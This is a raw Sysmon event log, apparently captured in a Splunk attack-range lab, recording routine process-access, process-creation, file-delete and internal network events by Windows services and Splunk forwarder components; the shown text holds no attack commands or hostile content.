10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1189-6216-5B04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1189-6216-5B04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.398{4F8D34B0-1189-6216-5B04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:50.793{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D903E5593DDEDB9B01759A1E16196D9,SHA256=4AECAF72C723F654C1DBF0B614CCA29D8EA97DA9BA5143406DBED6A161DACEC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A34D3EF571D321406B22E7D26B106F,SHA256=4CF487BBBE668132A76346F17E4A50811F22F3CFE23103F2168CBB8BEF358B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.586{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0C1983A593C5281441F75FF7269B69E,SHA256=4E2992B664DD8345D2E74504D90A977B49801D4CFAFC659CAFD62A22131D178B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.259{4F8D34B0-118A-6216-5C04-000000003902}39241328C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-118A-6216-5C04-000000003902}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-118A-6216-5C04-000000003902}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.023{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-118A-6216-5C04-000000003902}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.024{4F8D34B0-118A-6216-5C04-000000003902}3924C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:51.808{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FE9F36BEB7C6387DF45F7091040E1B,SHA256=EBCC46B43CC69A0B019322E66B590FA4FAF6BE0FC68B30489F2D83224CC98491,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:48.657{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53441-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.649{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B54ACEFB8BF9C08218F72BB96226A01,SHA256=6CFDFCEB9829131EF6F9B75B9409D5D5F52E67C78845A059D2DD6C2F0CFDFF99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-118B-6216-5D04-000000003902}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d3